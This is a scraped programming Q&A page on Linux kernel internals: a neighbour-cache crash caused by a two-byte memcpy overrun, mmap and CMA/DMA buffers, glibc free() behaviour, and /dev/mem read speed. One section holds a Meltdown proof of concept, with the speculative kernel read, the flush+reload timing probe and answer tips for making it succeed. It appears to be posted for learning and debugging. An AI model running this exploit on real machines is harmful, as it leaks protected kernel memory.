Kernel address poisoning by clearing upper bits? - linux-kernel

Is there some mechanism in Linux which poisons addresses by zeroing the upper 16 bits?
I am debugging a kernel crash on an Intel x86-64 machine. The instruction causing the crash tries to access the address 0x880139f3da00:
crash> bt
R10: 0000000000000001 R11: 0000000000000001 R12: 0000880139f3da00
~~~~~~~~~~~~~~~~~~~~~
crash> p arp_tbl.nht->hash_buckets[255]
$66 = (struct neighbour *) 0x880139f3da00
crash> p *arp_tbl.nht->hash_buckets[255]
Cannot access memory at address 0x880139f3da00
The hash_buckets table is valid:
crash> p arp_tbl.nht->hash_buckets[253]
$70 = (struct neighbour *) 0xffff88007325ae00
crash> p *arp_tbl.nht->hash_buckets[253]
$71 = {
next = 0x0,
tbl = 0xffffffff81abbf20 <arp_tbl>,
Setting the upper word to 0xffff makes the address valid and yields a valid data structure:
crash> p *((struct neighbour *)0xffff880139f3da00)
$73 = {
next = 0xffff88006de69a00,
tbl = 0xffffffff81abbf20 <arp_tbl>,
... rest looks reasonable too ...
The structure is updated by RCU operations (very likely the ones in neigh_flush_dev()). So what could cause the address to become invalid in this way?
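For reference, the RCU unlink in neigh_flush_dev() looks roughly like this (paraphrased from net/core/neighbour.c of that era):
rcu_assign_pointer(*np, rcu_dereference_protected(n->next,
                        lockdep_is_held(&tbl->lock)));
...
neigh_cleanup_and_release(n); /* the entry is freed only after an RCU grace period */
A correct rcu_assign_pointer() publishes either the old or the new pointer value atomically, so readers should never observe a pointer with only its upper bits cleared.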
I can exclude hardware defects (seen on two machines and with different addresses). The systems run CentOS 7 with kernels 3.10.0-514.6.1.el7.centos.plus.x86_64 through 3.10.0-514.21.2.el7.centos.plus.x86_64.
Update
From another crash dump, I see an skb of an IPv6 packet with
crash> p *((struct sk_buff *)0xffff880070e25e00)
$57 = {
transport_header = 54,
network_header = 14,
mac_header = 0,
...
head = 0xffff880138e28000 "",
data = 0xffff880138e2800e "`",
...
}
This crashes when writing the first 8 bytes in neigh_hh_output() (snippet condensed; hh_len is read from hh->hh_len a few lines earlier):
#define HH_DATA_MOD 16

static inline int neigh_hh_output(const struct hh_cache *hh, struct sk_buff *skb)
{
    unsigned int hh_len = hh->hh_len;
    ...
    if (likely(hh_len <= HH_DATA_MOD)) {
        memcpy(skb->data - HH_DATA_MOD, hh->hh_data, HH_DATA_MOD); <<<<<
This would explain why two bytes are overwritten: skb->data - skb->head is only 14 bytes of headroom (the network header offset), while the memcpy writes HH_DATA_MOD = 16 bytes starting at skb->data - 16, so 16 - 14 = 2 bytes land in front of skb->head.
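Worked out with the addresses from the dump above: head = 0xffff880138e28000 and data = head + 14, so the memcpy destination is data - 16 = 0xffff880138e27ffe, and the 16-byte copy covers 0xffff880138e27ffe through 0xffff880138e2800d, i.e. the last two bytes of whatever object precedes this buffer get clobbered.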

Can you inspect the memory location this address was read from? Typically such a "partial zero" read is the result of a memset() running concurrently on the area. After this CPU triggered the crash, there was possibly enough time for whoever else was modifying the area to finish zeroing it and possibly even fill it with other data.
So far there is no reason to suspect RCU plays any role here.
This is most definitely not "poisoning" done by the kernel (it would be quite weird to do it this way). However, if the crash is reproducible (you say it occurred on at least 2 different machines?), then running a debug kernel may help, especially with slab debugging enabled.
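For reference, slab debugging can also be switched on for a stock kernel with a boot parameter, e.g.:
slub_debug=FZPU
where F enables sanity checks, Z red zoning, P object poisoning, and U alloc/free tracking. With poisoning enabled, a use-after-free read tends to return the 0x6b poison pattern rather than a silently modified pointer, which makes this class of bug much easier to spot.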

Related

MMAP buffer kernel writes are not seen by user space

I have a kernel driver which shares a buffer with the user-space layer.
Everything seemed to work fine in my VM prototype (Ubuntu, kernel 5.4), but when I moved my code to the target (same kernel, but an embedded distro) I can clearly see that kernel writes to the buffer (using memcpy or memset) are not reflected in the user-space side of the buffer.
Note that I use direct buffer accesses on both sides. There is no concurrency issue, as the kernel writes first and the user space reads afterwards.
I ended up believing this is a cache issue, as the same code works perfectly in my VM.
The buffer size is 4 * PAGE_SIZE.
It is allocated as follows:
int _size = (SFP_BUFFER_SIZE + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1); /* round up to a multiple of PAGE_SIZE */
input_buffer = (char *)kzalloc(_size, GFP_KERNEL); // aligned on page boundary
if (!input_buffer) {
    dev_dbg(&dev, "open/ENOMEM (input_buffer)\n");
    status = -ENOMEM;
    goto err_all;
}
When mmap'ing, i used the following code pattern:
vma->vm_ops = &fpgadrv_vm_ops;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
pfn = virt_to_phys((void*)(input_buffer)) >> PAGE_SHIFT;
if (remap_pfn_range (vma, vma->vm_start, pfn, size, vma->vm_page_prot))
{
printk(KERN_DEBUG "remap page range failed\n");
return -EAGAIN;
}
User-space code and kernel code use memcpy to update the buffer. Note also that I cannot use the write/read entry points, as they are already used for very specific operations.
The user code is calling mmap as follows:
buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, device_fd, 0);
if (buf == MAP_FAILED)
{
perror("USERDRV:cannot mmap");
return -1; // for testing, ignore the return code and continue
}
and upon IOCTL call, the kernel would fill up the mmap buffer as follows:
case IOCTL_RESET:
printk(KERN_DEBUG "FPGADRV: IOCTL RESET");
// reset the buffer (zero + put back the signature)
memset(input_buffer, 0xA5, SFP_BUFFER_SIZE);
memcpy((void*)(input_buffer), (void*)signature, 10);
break;
Is there something more I should do to make sure the pages are not cached (assuming this is the cause of my problem)?
Thanks,
Jacques

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the Meltdown security flaw on Ubuntu 16.04, with an unpatched 4.8.0-36 kernel on an Intel Core i5-4300M CPU.
First, I store the secret data at an address in kernel space using a kernel module:
static __init int initialize_proc(void){
    char *key_val = "abcd";
    printk("Secret data address = %p\n", key_val);
    printk("Value at %p = %s\n", key_val, key_val);
    return 0;
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out-of-order execution
int meltdown(unsigned long kernel_addr){
    char data = *(char *)kernel_addr;  // raises exception
    array[data*4096 + DELTA] += 10;    // <----- execute out of order
    return 0;
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 + DELTA) while executing out of order. Only after this does the privilege check on the kernel address fail and SIGSEGV get raised.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
    register uint64_t time1, time2;
    unsigned int temp;    /* aux output for __rdtscp; also receives the probe read */
    uint64_t min = 10000;
    int i, k = -1;
    for (i = 0; i < 256; i++) {
        time1 = __rdtscp(&temp);            /* timestamp before the memory access */
        temp = array[i*4096 + DELTA];
        time2 = __rdtscp(&temp) - time1;    /* elapsed timestamp after the access */
        if (time2 <= min) {
            min = time2;
            k = i;
        }
    }
    printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is 'a' (ASCII 97), I expect the result to be array[97*4096+DELTA].
However, this does not work, and I get random outputs:
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
1. The instruction caching the array element is not getting executed out of order.
2. Out-of-order execution is occurring, but the cache is being flushed.
3. I have misunderstood the mapping of memory in the kernel module, and the address I'm using is incorrect.
Since the system is vulnerable to Meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: why is out-of-order execution not working here? Are there any options/flags that "encourage" the CPU to execute out of order?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
    int i, k = -1, temp;
    uint64_t diff, min = 10000000;
    volatile uint8_t *addr;
    struct timespec start, end;
    for (i = 0; i < 256; i++) {
        addr = &array[i*4096 + DELTA];
        clock_gettime(CLOCK_MONOTONIC, &start);
        temp = *addr;
        clock_gettime(CLOCK_MONOTONIC, &end);
        diff = end.tv_nsec - start.tv_nsec;
        if (diff <= min) {
            min = diff;
            k = i;
        }
    }
    if (min < 600)
        printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
    char kernel_data;
    /* serial chain of 1000 one-cycle adds to delay retirement */
    asm volatile(
        ".rept 1000;"
        "add $0x01, %%eax;"
        ".endr;"
        :
        :
        : "eax"
    );
    kernel_data = *(char *)kernel_addr;      /* raises exception */
    array[kernel_data*4096 + DELTA] += 10;   /* hoped to execute out of order */
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
    // Cache the data to improve the chance of success
    int fd = open("/proc/my_secret_key", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }
    int ret = pread(fd, NULL, 0, 0);   // data is cached by the kernel-side read
    char data = *(char *)kernel_addr;  // raises exception
    array[data*4096 + DELTA] += 10;    // <----- out of order
    return 0;
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
    int i;
    for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;           /* touch every probe line */
    for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]); /* then flush them from cache */
}
void catch_segv(int sig){
    siglongjmp(jbuf, 1);
}
int main(){
    unsigned long kernel_addr = 0xfa2ef024;
    signal(SIGSEGV, catch_segv);
    if (sigsetjmp(jbuf, 1) == 0) {
        // meltdown(kernel_addr);
        meltdown_busy_loop(kernel_addr);
    } else {
        printf("Memory Access Violation\n");
    }
    attackChannel_x86();
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
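A minimal sketch of that idea, assuming the module exposes a proc file and secret_data is the module's pointer to the secret (names are hypothetical):
/* proc read handler in the secret-holding module: touching the secret
 * with kernel privileges pulls it into L1d before the attack runs */
static ssize_t secret_touch_read(struct file *file, char __user *buf,
                                 size_t count, loff_t *ppos)
{
    volatile char sink = *(volatile char *)secret_data;
    (void)sink;    /* deliberately copy nothing to user space */
    return 0;
}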
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.
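A sketch of the busy loop rewritten along those lines (same structure as meltdown_busy_loop above; untested):
void meltdown_sqrt_delay(unsigned long kernel_addr){
    char kernel_data;
    /* ~40 serially dependent sqrtpd uops: few ROB entries, ~16c latency
     * each, so the faulting load retires far later than with 1c adds */
    asm volatile(
        "xorps %%xmm0, %%xmm0;"
        ".rept 40;"
        "sqrtpd %%xmm0, %%xmm0;"
        ".endr;"
        :
        :
        : "xmm0"
    );
    kernel_data = *(char *)kernel_addr;      /* raises exception */
    array[kernel_data*4096 + DELTA] += 10;   /* hoped to run speculatively */
}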

How to work with reserved CMA memory?

I would like to allocate a piece of physically contiguous reserved memory (at predefined physical addresses) for my device with DMA support.
As I see it, CMA has three options:
1. Reserve memory via the kernel config.
2. Reserve memory via the kernel cmdline.
3. Reserve memory via a device-tree memory node.
In the first case, the size and the number of areas can be reserved:
CONFIG_DMA_CMA=y
CONFIG_CMA_AREAS=7
CONFIG_CMA_SIZE_MBYTES=8
So I could use:
start_cma_virt = dma_alloc_coherent(dev->cmadev, (size_t)size_cma, &start_cma_dma, GFP_KERNEL);
in my driver to allocate contiguous memory. I could use it at most 7 times, allocating up to 8 MB in total. But unfortunately, because of
dma_contiguous_reserve(min(arm_dma_limit, arm_lowmem_limit));
called from arch/arm/mm/init.c:
void __init arm_memblock_init(struct meminfo *mi, const struct machine_desc *mdesc)
it is impossible to set predefined physical addresses for the contiguous allocation.
Of course I could use the kernel cmdline:
mem=cma=cmadevlabel=8M#32M cma_map=mydevname=cmadevlabel
//struct device *dev = cmadev->dev; /*dev->name is mydevname*/
After that, dma_alloc_coherent() should allocate memory in the physical region starting at 32 MB and spanning 8 MB (0x2000000 up to 0x27FFFFF).
But unfortunately I have a problem with this solution. Maybe my cmdline has an error?
The next thing I tried was a device-tree implementation:
cmadev_region: mycma {
/*no-map;*/ /*DMA coherent memory*/
/*reusable;*/
reg = <0x02000000 0x00100000>;
};
And a phandle in some node:
memory-region = <&cmadev_region>;
As I saw in the kernel, it should usually be used like this:
of_find_node_by_name(); //find needed node
of_parse_phandle(); //resolve a phandle property to a device_node pointer
of_get_address(); //get DT __be32 physical addresses
of_translate_address(); //DT represent local (bus, device) addresses so translate it to CPU physical addresses
request_mem_region(); //reserve IOMAP memory (cat /proc/iomem)
ioremap(); //alloc entry in page table for reserved memory and return kernel logical addresses.
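Strung together, that non-DMA path would look roughly like this (a sketch with error handling omitted; the property name memory-region is assumed):
u64 size;
struct device_node *np = of_parse_phandle(dev->of_node, "memory-region", 0);
const __be32 *reg = of_get_address(np, 0, &size, NULL);
phys_addr_t paddr = of_translate_address(np, reg);
request_mem_region(paddr, size, "mydev");      /* shows up in /proc/iomem */
void __iomem *base = ioremap(paddr, size);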
But I want to use DMA via dma_alloc_coherent() (as far as I know, the only external API function for this) instead of IO-mapping with ioremap(). But how do I call
start_cma_virt = dma_alloc_coherent(dev->cmadev, (size_t)size_cma, &start_cma_dma, GFP_KERNEL);
so that the memory from the device tree (reg = <0x02000000 0x00100000>;) is associated with dev->cmadev? In the cmdline case it is clear: it has the device name and the address region.
After calling of_parse_phandle(), is the reserved memory automatically booked for the driver which parses the DT? And will the next dma_alloc_coherent() call then allocate the DMA area inside the memory from cmadev_region: mycma?
To use dma_alloc_coherent() on a reserved-memory node, you need to declare that area as DMA-coherent. You can do something like this:
In the DT:
cmadev_region: mycma {
    compatible = "compatible-name";
    no-map;
    reg = <0x02000000 0x00100000>;
};
In your driver:
struct device *cma_dev;

static int rmem_dma_device_init(struct reserved_mem *rmem, struct device *dev)
{
    int ret;

    ret = dma_declare_coherent_memory(cma_dev, rmem->base, rmem->base,
                                      rmem->size, DMA_MEMORY_EXCLUSIVE);
    if (ret) {
        pr_err("dma_declare_coherent_memory failed: %d\n", ret);
        return ret;
    }
    return 0;
}
static void rmem_dma_device_release(struct reserved_mem *rmem,
struct device *dev)
{
if (dev)
dev->dma_mem = NULL;
}
static const struct reserved_mem_ops rmem_dma_ops = {
.device_init = rmem_dma_device_init,
.device_release = rmem_dma_device_release,
};
int __init cma_setup(struct reserved_mem *rmem)
{
rmem->ops = &rmem_dma_ops;
return 0;
}
RESERVEDMEM_OF_DECLARE(some_name, "compatible-name", cma_setup);
Now you can perform dma_alloc_coherent() on this cma_dev and get memory from the reserved region.
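One detail the snippet leaves open is how .device_init gets invoked. A hedged sketch of the usual glue, assuming a platform driver whose DT node carries memory-region = <&cmadev_region>; (driver name hypothetical):
#include <linux/of_reserved_mem.h>
#include <linux/platform_device.h>

static int mydrv_probe(struct platform_device *pdev)
{
    dma_addr_t dma_handle;
    void *vaddr;
    int ret;

    cma_dev = &pdev->dev;    /* the global used by rmem_dma_device_init() above */

    /* binds pdev->dev to its memory-region phandle and calls the
     * reserved_mem_ops .device_init registered above */
    ret = of_reserved_mem_device_init(&pdev->dev);
    if (ret)
        return ret;

    /* coherent allocations now come from the reserved area */
    vaddr = dma_alloc_coherent(&pdev->dev, 0x100000, &dma_handle, GFP_KERNEL);
    if (!vaddr) {
        of_reserved_mem_device_release(&pdev->dev);
        return -ENOMEM;
    }
    return 0;
}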

Why doesn't free execute munmap?

I have the following code:
unsigned char *p = (unsigned char *)valloc(page_size);
if (!p) {
ret = -1;
goto out;
}
printf("valloc: allocated %d bytes, virtual address: %p\n", page_size, p);
memset(p, 0xFF, page_size);
memcpy(p, s, sizeof(s));
trace_mem(p, sizeof(s));
printf("Memory: %p - press any key\n", p);
getchar();
if (ioctl(fd, MY_IOC_PATCH) == -1) {
fprintf(stderr, "ioctl %s error(%d): %s\n ", "MY_IOC_PATCH", errno, strerror(errno));
ret = -1;
goto out;
}
if (p) {
printf("free: freed %d bytes, virtual address: %p\n", page_size, p);
free(p);
}
.........................
Then I use strace to observe the system calls (strace ./my_program) and get the following:
fstat64(1, {st_mode=S_IFREG|0644, st_size=1533, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7730000
brk(0) = 0x9d81000
brk(0x9da4000) = 0x9da4000
fstat64(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb772f000
read(0, "\n", 1024) = 1
ioctl(3, RTC_IRQP_SET, 0x1000) = 0
read(0, "\n", 1024) = 1
ioctl(3, RTC_EPOCH_READ, 0x9d82000) = 0
read(0, "\n", 1024) = 1
close(3) = 0
valloc: allocated 4096 bytes, virtual address: 0x9d82000
After the first IOCTL I don't see an munmap. I suppose that free must use munmap to unmap the memory, but it doesn't. What is the reason for that?
I think that Paramagnetic Croissant's comment, above, qualifies as "the Answer" to this one. It is ordinary practice for malloc() implementations to ask the operating system for more memory when they need it, but then never to give it back. For any operating system.
You see, there's really no need to "give it back." Pestering the kernel, asking it to carve out more VM space and to update the memory-management data structures, is a comparatively expensive operation. But it doesn't really "cost" much to keep the storage around. (Releasing it gains you nothing, especially if you turn right around and have to ask for it again!) So, you just do it once.
If you stop using those pages, they'll eventually get swapped out, and the physical resource (page frames) will automagically get used for other purposes. "No harm, no foul." But if you then suddenly start using that storage again, there's no reason to "pester the kernel" a second (or third) time. The pages just get swapped in again, and off you go.
malloc/valloc (the page-aligned variant of malloc) actually hands out addresses from the process's virtual address space. These addresses are mapped to physical memory by way of page tables that are specific to the particular process. Hence, in my opinion, all the kernel has to do in the case of malloc/valloc is:
1) Attach an anonymous segment to the process.
2) Associate a bunch of virtual address (heap area) entries with physical pages, of course on first use.
In the case of free, it just needs to disassociate the virtual memory entries from the physical pages. Note that since these are anonymous pages, it doesn't need to care where the "data" goes, whereas when munmapping a file mapping it may need to write the data back to disk.
The physical pages are tracked and managed by the memory manager independently, governed by caching principles (hot/cold, page coloring, etc.). Thus there is no question of free trying to give memory back to the kernel, since all it got was a virtual address range. It gives that range back to the glibc allocator, which maintains the free chunks for reuse by the process.
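For contrast, glibc does issue munmap() on free() for allocations large enough to be served by mmap() directly (the default M_MMAP_THRESHOLD is 128 KiB), which is easy to verify under strace:
#include <stdlib.h>

int main(void)
{
    void *small = malloc(4096);   /* served from the heap (brk); free() keeps it for reuse */
    free(small);

    void *big = malloc(1 << 20);  /* above the mmap threshold: strace shows
                                     mmap() here and munmap() on free() */
    free(big);
    return 0;
}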

mmap /dev/mem, read performance is very slow

I have written a test program which is like this:
fd = open("/dev/mem", O_RDWR);
src = mmap(0x0, 0x1000000, PROT_READ, MAP_SHARED, fd, 0x80000000);/* 0x80000000 is physical start address of DDR on my A8-cortex platform */
dst = malloc(0x1000000);
start_time = get_time()
memcpy(dst, src, 0x1000000);
end_time = get_time();
print_speed();
On my ARM Cortex-A8 based board, this gives me about 400 MB/s. Then I changed the test program so that the src buffer is also allocated by malloc and tested again; now it gives me about 1400 MB/s, roughly 3-4x faster.
I tried to figure out the reason. First, I suspected that the src memory mapped through /dev/mem is uncached, so I checked the code in drivers/char/mem.c in the kernel. In the mmap_mem() function I used printk to print the page attributes of the mapped address; vma->vm_page_prot shows 0x10f, so it is not uncached.
Furthermore, I changed the code to force the uncached type via vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot) and tested again; the result is about 30 MB/s. So we can definitely confirm that /dev/mem mapped memory is cached, yet its read performance is very slow compared to malloced memory.
How can this test result be explained?
